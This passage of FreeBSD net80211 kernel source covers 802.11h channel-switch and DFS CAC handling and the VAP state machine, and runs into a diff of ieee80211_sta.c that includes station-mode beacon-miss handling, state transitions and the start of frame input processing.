ieee80211_csa_startswitch(struct ieee80211com *ic, struct ieee80211_channel *c, int mode, int count) { struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); ic->ic_csa_newchan = c; ic->ic_csa_mode = mode; ic->ic_csa_count = count; ic->ic_flags |= IEEE80211_F_CSAPENDING; TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) ieee80211_beacon_notify(vap, IEEE80211_BEACON_CSA); /* switch to CSA state to block outbound traffic */ if (vap->iv_state == IEEE80211_S_RUN) ieee80211_new_state_locked(vap, IEEE80211_S_CSA, 0); } ieee80211_notify_csa(ic, c, mode, count); } /* * Complete the channel switch by transitioning all CSA VAPs to RUN. * This is called by both the completion and cancellation functions * so each VAP is placed back in the RUN state and can thus transmit. */ static void csa_completeswitch(struct ieee80211com *ic) { struct ieee80211vap *vap; ic->ic_csa_newchan = NULL; ic->ic_flags &= ~IEEE80211_F_CSAPENDING; TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CSA) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, 0); } /* * Complete an 802.11h channel switch started by ieee80211_csa_startswitch. * We clear state and move all vap's in CSA state to RUN state * so they can again transmit. * * Although this may not be completely correct, update the BSS channel * for each VAP to the newly configured channel. The setcurchan sets * the current operating channel for the interface (so the radio does * switch over) but the VAP BSS isn't updated, leading to incorrectly * reported information via ioctl. */ void ieee80211_csa_completeswitch(struct ieee80211com *ic) { struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); KASSERT(ic->ic_flags & IEEE80211_F_CSAPENDING, ("csa not pending")); ieee80211_setcurchan(ic, ic->ic_csa_newchan); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CSA) vap->iv_bss->ni_chan = ic->ic_curchan; csa_completeswitch(ic); } /* * Cancel an 802.11h channel switch started by ieee80211_csa_startswitch. * We clear state and move all vap's in CSA state to RUN state * so they can again transmit. */ void ieee80211_csa_cancelswitch(struct ieee80211com *ic) { IEEE80211_LOCK_ASSERT(ic); csa_completeswitch(ic); } /* * Complete a DFS CAC started by ieee80211_dfs_cac_start. * We clear state and move all vap's in CAC state to RUN state. */ void ieee80211_cac_completeswitch(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK(ic); /* * Complete CAC state change for lead vap first; then * clock all the other vap's waiting. */ KASSERT(vap0->iv_state == IEEE80211_S_CAC, ("wrong state %d", vap0->iv_state)); ieee80211_new_state_locked(vap0, IEEE80211_S_RUN, 0); TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) if (vap->iv_state == IEEE80211_S_CAC) ieee80211_new_state_locked(vap, IEEE80211_S_RUN, 0); IEEE80211_UNLOCK(ic); } /* * Force all vap's other than the specified vap to the INIT state * and mark them as waiting for a scan to complete. These vaps * will be brought up when the scan completes and the scanning vap * reaches RUN state by wakeupwaiting. */ static void markwaiting(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); /* * A vap list entry can not disappear since we are running on the * taskqueue and a vap destroy will queue and drain another state * change task. */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap == vap0) continue; if (vap->iv_state != IEEE80211_S_INIT) { /* NB: iv_newstate may drop the lock */ vap->iv_newstate(vap, IEEE80211_S_INIT, 0); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; } } } /* * Wakeup all vap's waiting for a scan to complete. This is the * companion to markwaiting (above) and is used to coordinate * multiple vaps scanning. * This is called from the state taskqueue. */ static void wakeupwaiting(struct ieee80211vap *vap0) { struct ieee80211com *ic = vap0->iv_ic; struct ieee80211vap *vap; IEEE80211_LOCK_ASSERT(ic); /* * A vap list entry can not disappear since we are running on the * taskqueue and a vap destroy will queue and drain another state * change task. */ TAILQ_FOREACH(vap, &ic->ic_vaps, iv_next) { if (vap == vap0) continue; if (vap->iv_flags_ext & IEEE80211_FEXT_SCANWAIT) { vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANWAIT; /* NB: sta's cannot go INIT->RUN */ /* NB: iv_newstate may drop the lock */ vap->iv_newstate(vap, vap->iv_opmode == IEEE80211_M_STA ? IEEE80211_S_SCAN : IEEE80211_S_RUN, 0); IEEE80211_LOCK_ASSERT(ic); } } } /* * Handle post state change work common to all operating modes. */ static void ieee80211_newstate_cb(void *xvap, int npending) { struct ieee80211vap *vap = xvap; struct ieee80211com *ic = vap->iv_ic; enum ieee80211_state nstate, ostate; int arg, rc; IEEE80211_LOCK(ic); nstate = vap->iv_nstate; arg = vap->iv_nstate_arg; if (vap->iv_flags_ext & IEEE80211_FEXT_REINIT) { /* * We have been requested to drop back to the INIT before * proceeding to the new state. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s arg %d\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[IEEE80211_S_INIT], arg); vap->iv_newstate(vap, IEEE80211_S_INIT, arg); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext &= ~IEEE80211_FEXT_REINIT; } ostate = vap->iv_state; if (nstate == IEEE80211_S_SCAN && ostate != IEEE80211_S_INIT) { /* * SCAN was forced; e.g. on beacon miss. Force other running * vap's to INIT state and mark them as waiting for the scan to * complete. This insures they don't interfere with our * scanning. Since we are single threaded the vaps can not * transition again while we are executing. * * XXX not always right, assumes ap follows sta */ markwaiting(vap); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s arg %d\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); rc = vap->iv_newstate(vap, nstate, arg); IEEE80211_LOCK_ASSERT(ic); vap->iv_flags_ext &= ~IEEE80211_FEXT_STATEWAIT; if (rc != 0) { /* State transition failed */ KASSERT(rc != EINPROGRESS, ("iv_newstate was deferred")); KASSERT(nstate != IEEE80211_S_INIT, ("INIT state change failed")); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s returned error %d\n", __func__, ieee80211_state_name[nstate], rc); goto done; } /* No actual transition, skip post processing */ if (ostate == nstate) goto done; if (nstate == IEEE80211_S_RUN) { /* * OACTIVE may be set on the vap if the upper layer * tried to transmit (e.g. IPv6 NDP) before we reach * RUN state. Clear it and restart xmit. * * Note this can also happen as a result of SLEEP->RUN * (i.e. coming out of power save mode). */ vap->iv_ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; /* * XXX TODO Kick-start a VAP queue - this should be a method! */ /* bring up any vaps waiting on us */ wakeupwaiting(vap); } else if (nstate == IEEE80211_S_INIT) { /* * Flush the scan cache if we did the last scan (XXX?) * and flush any frames on send queues from this vap. * Note the mgt q is used only for legacy drivers and * will go away shortly. */ ieee80211_scan_flush(vap); /* * XXX TODO: ic/vap queue flush */ } done: IEEE80211_UNLOCK(ic); } /* * Public interface for initiating a state machine change. * This routine single-threads the request and coordinates * the scheduling of multiple vaps for the purpose of selecting * an operating channel. Specifically the following scenarios * are handled: * o only one vap can be selecting a channel so on transition to * SCAN state if another vap is already scanning then * mark the caller for later processing and return without * doing anything (XXX? expectations by caller of synchronous operation) * o only one vap can be doing CAC of a channel so on transition to * CAC state if another vap is already scanning for radar then * mark the caller for later processing and return without * doing anything (XXX? expectations by caller of synchronous operation) * o if another vap is already running when a request is made * to SCAN then an operating channel has been chosen; bypass * the scan and just join the channel * * Note that the state change call is done through the iv_newstate * method pointer so any driver routine gets invoked. The driver * will normally call back into operating mode-specific * ieee80211_newstate routines (below) unless it needs to completely * bypass the state machine (e.g. because the firmware has it's * own idea how things should work). Bypassing the net80211 layer * is usually a mistake and indicates lack of proper integration * with the net80211 layer. */ int ieee80211_new_state_locked(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211vap *vp; enum ieee80211_state ostate; int nrunning, nscanning; IEEE80211_LOCK_ASSERT(ic); if (vap->iv_flags_ext & IEEE80211_FEXT_STATEWAIT) { if (vap->iv_nstate == IEEE80211_S_INIT) { /* * XXX The vap is being stopped, do no allow any other * state changes until this is completed. */ return -1; } else if (vap->iv_state != vap->iv_nstate) { #if 0 /* Warn if the previous state hasn't completed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: pending %s -> %s transition lost\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[vap->iv_nstate]); #else /* XXX temporarily enable to identify issues */ if_printf(vap->iv_ifp, "%s: pending %s -> %s transition lost\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[vap->iv_nstate]); #endif } } nrunning = nscanning = 0; /* XXX can track this state instead of calculating */ TAILQ_FOREACH(vp, &ic->ic_vaps, iv_next) { if (vp != vap) { if (vp->iv_state >= IEEE80211_S_RUN) nrunning++; /* XXX doesn't handle bg scan */ /* NB: CAC+AUTH+ASSOC treated like SCAN */ else if (vp->iv_state > IEEE80211_S_INIT) nscanning++; } } ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (nrunning %d nscanning %d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], nrunning, nscanning); switch (nstate) { case IEEE80211_S_SCAN: if (ostate == IEEE80211_S_INIT) { /* * INIT -> SCAN happens on initial bringup. */ KASSERT(!(nscanning && nrunning), ("%d scanning and %d running", nscanning, nrunning)); if (nscanning) { /* * Someone is scanning, defer our state * change until the work has completed. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: defer %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; return 0; } if (nrunning) { /* * Someone is operating; just join the channel * they have chosen. */ /* XXX kill arg? */ /* XXX check each opmode, adhoc? */ if (vap->iv_opmode == IEEE80211_M_STA) nstate = IEEE80211_S_SCAN; else nstate = IEEE80211_S_RUN; #ifdef IEEE80211_DEBUG if (nstate != IEEE80211_S_SCAN) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: override, now %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); } #endif } } break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_WDS && (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) && nscanning) { /* * Legacy WDS with someone else scanning; don't * go online until that completes as we should * follow the other vap to the channel they choose. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: defer %s -> %s (legacy WDS)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); vap->iv_flags_ext |= IEEE80211_FEXT_SCANWAIT; return 0; } if (vap->iv_opmode == IEEE80211_M_HOSTAP && IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS) && !IEEE80211_IS_CHAN_CACDONE(ic->ic_bsschan)) { /* * This is a DFS channel, transition to CAC state * instead of RUN. This allows us to initiate * Channel Availability Check (CAC) as specified * by 11h/DFS. */ nstate = IEEE80211_S_CAC; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: override %s -> %s (DFS)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); } break; case IEEE80211_S_INIT: /* cancel any scan in progress */ ieee80211_cancel_scan(vap); if (ostate == IEEE80211_S_INIT ) { /* XXX don't believe this */ /* INIT -> INIT. nothing to do */ vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANWAIT; } /* fall thru... */ default: break; } /* defer the state change to a thread */ vap->iv_nstate = nstate; vap->iv_nstate_arg = arg; vap->iv_flags_ext |= IEEE80211_FEXT_STATEWAIT; ieee80211_runtask(ic, &vap->iv_nstate_task); return EINPROGRESS; } int ieee80211_new_state(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; int rc; IEEE80211_LOCK(ic); rc = ieee80211_new_state_locked(vap, nstate, arg); IEEE80211_UNLOCK(ic); return rc; } diff --git a/sys/net80211/ieee80211_sta.c b/sys/net80211/ieee80211_sta.c index 84d25df611c9..8685e4b0460f 100644 --- a/sys/net80211/ieee80211_sta.c +++ b/sys/net80211/ieee80211_sta.c @@ -1,1804 +1,1804 @@ /*- * Copyright (c) 2007-2008 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 Station mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #include #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void sta_vattach(struct ieee80211vap *); static void sta_beacon_miss(struct ieee80211vap *); static int sta_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int sta_input(struct ieee80211_node *, struct mbuf *, int, int); static void sta_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int rssi, int nf); static void sta_recv_ctl(struct ieee80211_node *, struct mbuf *, int subtype); void ieee80211_sta_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_STA] = sta_vattach; } void ieee80211_sta_detach(struct ieee80211com *ic) { } static void sta_vdetach(struct ieee80211vap *vap) { } static void sta_vattach(struct ieee80211vap *vap) { vap->iv_newstate = sta_newstate; vap->iv_input = sta_input; vap->iv_recv_mgmt = sta_recv_mgmt; vap->iv_recv_ctl = sta_recv_ctl; vap->iv_opdetach = sta_vdetach; vap->iv_bmiss = sta_beacon_miss; } /* * Handle a beacon miss event. The common code filters out * spurious events that can happen when scanning and/or before * reaching RUN state. */ static void sta_beacon_miss(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; IEEE80211_LOCK_ASSERT(ic); KASSERT((ic->ic_flags & IEEE80211_F_SCAN) == 0, ("scanning")); KASSERT(vap->iv_state >= IEEE80211_S_RUN, ("wrong state %s", ieee80211_state_name[vap->iv_state])); IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE | IEEE80211_MSG_DEBUG, "beacon miss, mode %s state %s\n", ieee80211_opmode_name[vap->iv_opmode], ieee80211_state_name[vap->iv_state]); if (vap->iv_state == IEEE80211_S_CSA) { /* * A Channel Switch is pending; assume we missed the * beacon that would've completed the process and just * force the switch. If we made a mistake we'll not * find the AP on the new channel and fall back to a * normal scan. */ ieee80211_csa_completeswitch(ic); return; } if (++vap->iv_bmiss_count < vap->iv_bmiss_max) { /* * Send a directed probe req before falling back to a * scan; if we receive a response ic_bmiss_count will * be reset. Some cards mistakenly report beacon miss * so this avoids the expensive scan if the ap is * still there. */ ieee80211_send_probereq(vap->iv_bss, vap->iv_myaddr, vap->iv_bss->ni_bssid, vap->iv_bss->ni_bssid, vap->iv_bss->ni_essid, vap->iv_bss->ni_esslen); return; } callout_stop(&vap->iv_swbmiss); vap->iv_bmiss_count = 0; vap->iv_stats.is_beacon_miss++; if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { #ifdef IEEE80211_SUPPORT_SUPERG struct ieee80211com *ic = vap->iv_ic; /* * If we receive a beacon miss interrupt when using * dynamic turbo, attempt to switch modes before * reassociating. */ if (IEEE80211_ATH_CAP(vap, vap->iv_bss, IEEE80211_NODE_TURBOP)) ieee80211_dturbo_switch(vap, ic->ic_bsschan->ic_flags ^ IEEE80211_CHAN_TURBO); #endif /* * Try to reassociate before scanning for a new ap. */ ieee80211_new_state(vap, IEEE80211_S_ASSOC, 1); } else { /* * Somebody else is controlling state changes (e.g. * a user-mode app) don't do anything that would * confuse them; just drop into scan mode so they'll * notified of the state change and given control. */ ieee80211_new_state(vap, IEEE80211_S_SCAN, 0); } } /* * Handle deauth with reason. We retry only for * the cases where we might succeed. Otherwise * we downgrade the ap and scan. */ static void sta_authretry(struct ieee80211vap *vap, struct ieee80211_node *ni, int reason) { switch (reason) { case IEEE80211_STATUS_SUCCESS: /* NB: MLME assoc */ case IEEE80211_STATUS_TIMEOUT: case IEEE80211_REASON_ASSOC_EXPIRE: case IEEE80211_REASON_NOT_AUTHED: case IEEE80211_REASON_NOT_ASSOCED: case IEEE80211_REASON_ASSOC_LEAVE: case IEEE80211_REASON_ASSOC_NOT_AUTHED: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); break; default: ieee80211_scan_assoc_fail(vap, vap->iv_bss->ni_macaddr, reason); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; } } /* * IEEE80211_M_STA vap state machine handler. * This routine handles the main states in the 802.11 protocol. */ static int sta_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; IEEE80211_LOCK_ASSERT(ic); ostate = vap->iv_state; IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: %s -> %s (%d)\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate], arg); vap->iv_state = nstate; /* state transition */ callout_stop(&vap->iv_mgtsend); /* XXX callout_drain */ if (ostate != IEEE80211_S_SCAN) ieee80211_cancel_scan(vap); /* background scan */ ni = vap->iv_bss; /* NB: no reference held */ if (vap->iv_flags_ext & IEEE80211_FEXT_SWBMISS) callout_stop(&vap->iv_swbmiss); switch (nstate) { case IEEE80211_S_INIT: switch (ostate) { case IEEE80211_S_SLEEP: /* XXX wakeup */ case IEEE80211_S_RUN: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DISASSOC, IEEE80211_REASON_ASSOC_LEAVE); ieee80211_sta_leave(ni); break; case IEEE80211_S_ASSOC: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_DEAUTH, IEEE80211_REASON_AUTH_LEAVE); break; case IEEE80211_S_SCAN: ieee80211_cancel_scan(vap); break; default: goto invalid; } if (ostate != IEEE80211_S_INIT) { /* NB: optimize INIT -> INIT case */ ieee80211_reset_bss(vap); } if (vap->iv_auth->ia_detach != NULL) vap->iv_auth->ia_detach(vap); break; case IEEE80211_S_SCAN: switch (ostate) { case IEEE80211_S_INIT: /* * Initiate a scan. We can come here as a result * of an IEEE80211_IOC_SCAN_REQ too in which case * the vap will be marked with IEEE80211_FEXT_SCANREQ * and the scan request parameters will be present * in iv_scanreq. Otherwise we do the default. */ if (vap->iv_flags_ext & IEEE80211_FEXT_SCANREQ) { ieee80211_check_scan(vap, vap->iv_scanreq_flags, vap->iv_scanreq_duration, vap->iv_scanreq_mindwell, vap->iv_scanreq_maxdwell, vap->iv_scanreq_nssid, vap->iv_scanreq_ssid); vap->iv_flags_ext &= ~IEEE80211_FEXT_SCANREQ; } else ieee80211_check_scan_current(vap); break; case IEEE80211_S_SCAN: case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: /* * These can happen either because of a timeout * on an assoc/auth response or because of a * change in state that requires a reset. For * the former we're called with a non-zero arg * that is the cause for the failure; pass this * to the scan code so it can update state. * Otherwise trigger a new scan unless we're in * manual roaming mode in which case an application * must issue an explicit scan request. */ if (arg != 0) ieee80211_scan_assoc_fail(vap, vap->iv_bss->ni_macaddr, arg); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; case IEEE80211_S_RUN: /* beacon miss */ /* * Beacon miss. Notify user space and if not * under control of a user application (roaming * manual) kick off a scan to re-connect. */ ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) ieee80211_check_scan_current(vap); break; default: goto invalid; } break; case IEEE80211_S_AUTH: switch (ostate) { case IEEE80211_S_INIT: case IEEE80211_S_SCAN: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); break; case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: switch (arg & 0xff) { case IEEE80211_FC0_SUBTYPE_AUTH: /* ??? */ IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 2); break; case IEEE80211_FC0_SUBTYPE_DEAUTH: sta_authretry(vap, ni, arg>>8); break; } break; case IEEE80211_S_RUN: switch (arg & 0xff) { case IEEE80211_FC0_SUBTYPE_AUTH: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 2); vap->iv_state = ostate; /* stay RUN */ break; case IEEE80211_FC0_SUBTYPE_DEAUTH: ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { /* try to reauth */ IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_AUTH, 1); } break; } break; default: goto invalid; } break; case IEEE80211_S_ASSOC: switch (ostate) { case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: IEEE80211_SEND_MGMT(ni, IEEE80211_FC0_SUBTYPE_ASSOC_REQ, 0); break; case IEEE80211_S_SLEEP: /* cannot happen */ case IEEE80211_S_RUN: ieee80211_sta_leave(ni); if (vap->iv_roaming == IEEE80211_ROAMING_AUTO) { IEEE80211_SEND_MGMT(ni, arg ? IEEE80211_FC0_SUBTYPE_REASSOC_REQ : IEEE80211_FC0_SUBTYPE_ASSOC_REQ, 0); } break; default: goto invalid; } break; case IEEE80211_S_RUN: if (vap->iv_flags & IEEE80211_F_WPA) { /* XXX validate prerequisites */ } switch (ostate) { case IEEE80211_S_RUN: case IEEE80211_S_CSA: break; case IEEE80211_S_AUTH: /* when join is done in fw */ case IEEE80211_S_ASSOC: #ifdef IEEE80211_DEBUG if (ieee80211_msg_debug(vap)) { ieee80211_note(vap, "%s with %s ssid ", (vap->iv_opmode == IEEE80211_M_STA ? "associated" : "synchronized"), ether_sprintf(ni->ni_bssid)); ieee80211_print_essid(vap->iv_bss->ni_essid, ni->ni_esslen); /* XXX MCS/HT */ printf(" channel %d start %uMb\n", ieee80211_chan2ieee(ic, ic->ic_curchan), IEEE80211_RATE2MBS(ni->ni_txrate)); } #endif ieee80211_scan_assoc_success(vap, ni->ni_macaddr); ieee80211_notify_node_join(ni, arg == IEEE80211_FC0_SUBTYPE_ASSOC_RESP); break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 0); break; default: goto invalid; } ieee80211_sync_curchan(ic); if (ostate != IEEE80211_S_RUN && (vap->iv_flags_ext & IEEE80211_FEXT_SWBMISS)) { /* * Start s/w beacon miss timer for devices w/o * hardware support. We fudge a bit here since * we're doing this in software. */ vap->iv_swbmiss_period = IEEE80211_TU_TO_TICKS( 2 * vap->iv_bmissthreshold * ni->ni_intval); vap->iv_swbmiss_count = 0; callout_reset(&vap->iv_swbmiss, vap->iv_swbmiss_period, ieee80211_swbmiss, vap); } /* * When 802.1x is not in use mark the port authorized * at this point so traffic can flow. */ if (ni->ni_authmode != IEEE80211_AUTH_8021X) ieee80211_node_authorize(ni); /* * Fake association when joining an existing bss. */ if (ic->ic_newassoc != NULL) ic->ic_newassoc(vap->iv_bss, ostate != IEEE80211_S_RUN); break; case IEEE80211_S_CSA: if (ostate != IEEE80211_S_RUN) goto invalid; break; case IEEE80211_S_SLEEP: vap->iv_sta_ps(vap, 1); break; default: invalid: IEEE80211_DPRINTF(vap, IEEE80211_MSG_STATE, "%s: unexpected state transition %s -> %s\n", __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); break; } return 0; } /* * Return non-zero if the frame is an echo of a multicast * frame sent by ourself. The dir is known to be DSTODS. */ static __inline int isdstods_mcastecho(struct ieee80211vap *vap, const struct ieee80211_frame *wh) { #define QWH4(wh) ((const struct ieee80211_qosframe_addr4 *)wh) #define WH4(wh) ((const struct ieee80211_frame_addr4 *)wh) const uint8_t *sa; KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode")); if (!IEEE80211_IS_MULTICAST(wh->i_addr3)) return 0; sa = IEEE80211_QOS_HAS_SEQ(wh) ? QWH4(wh)->i_addr4 : WH4(wh)->i_addr4; return IEEE80211_ADDR_EQ(sa, vap->iv_myaddr); #undef WH4 #undef QWH4 } /* * Return non-zero if the frame is an echo of a multicast * frame sent by ourself. The dir is known to be FROMDS. */ static __inline int isfromds_mcastecho(struct ieee80211vap *vap, const struct ieee80211_frame *wh) { KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode")); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) return 0; return IEEE80211_ADDR_EQ(wh->i_addr3, vap->iv_myaddr); } /* * Decide if a received management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BEACON: return (vap->iv_ic->ic_flags & IEEE80211_F_SCAN); case IEEE80211_FC0_SUBTYPE_PROBE_REQ: return 0; } return 1; } /* * Process a received frame. The node associated with the sender * should be supplied. If nothing was found in the node table then * the caller is assumed to supply a reference to iv_bss instead. * The RSSI and a timestamp are also supplied. The RSSI data is used * during AP scanning to select a AP to associate with; it can have * any units so long as values have consistent units and higher values * mean ``better signal''. The receive timestamp is currently not used * by the 802.11 layer. */ static int sta_input(struct ieee80211_node *ni, struct mbuf *m, int rssi, int nf) { #define HAS_SEQ(type) ((type & 0x4) == 0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_frame *wh; struct ieee80211_key *key; struct ether_header *eh; int hdrspace, need_tap = 1; /* mbuf need to be tapped. */ uint8_t dir, type, subtype, qos; uint8_t *bssid; uint16_t rxseq; if (m->m_flags & M_AMPDU_MPDU) { /* * Fastpath for A-MPDU reorder q resubmission. Frames * w/ M_AMPDU_MPDU marked have already passed through * here but were received out of order and been held on * the reorder queue. When resubmitted they are marked * with the M_AMPDU_MPDU flag and we can bypass most of * the normal processing. */ wh = mtod(m, struct ieee80211_frame *); type = IEEE80211_FC0_TYPE_DATA; dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; subtype = IEEE80211_FC0_SUBTYPE_QOS; hdrspace = ieee80211_hdrspace(ic, wh); /* XXX optimize? */ goto resubmit_ampdu; } KASSERT(ni != NULL, ("null node")); ni->ni_inact = ni->ni_inact_reload; type = -1; /* undefined */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_min)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "too short (1): len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } /* * Bit of a cheat here, we use a pointer for a 3-address * frame format but don't reference fields past outside * ieee80211_frame_min w/o first validating the data is * present. */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "wrong version, fc %02x:%02x", wh->i_fc[0], wh->i_fc[1]); vap->iv_stats.is_rx_badversion++; goto err; } dir = wh->i_fc[1] & IEEE80211_FC1_DIR_MASK; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; subtype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { bssid = wh->i_addr2; if (!IEEE80211_ADDR_EQ(bssid, ni->ni_bssid)) { /* not interested in */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "%s", "not to bss"); vap->iv_stats.is_rx_wrongbss++; goto out; } /* * Some devices may be in a promiscuous mode * where they receive frames for multiple station * addresses. * * If we receive a data frame that isn't * destined to our VAP MAC, drop it. * * XXX TODO: This is only enforced when not scanning; * XXX it assumes a software-driven scan will put the NIC * XXX into a "no data frames" mode before setting this * XXX flag. Otherwise it may be possible that we'll still * XXX process data frames whilst scanning. */ if ((! IEEE80211_IS_MULTICAST(wh->i_addr1)) && (! IEEE80211_ADDR_EQ(wh->i_addr1, IF_LLADDR(ifp)))) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, bssid, NULL, "not to cur sta: lladdr=%6D, addr1=%6D", 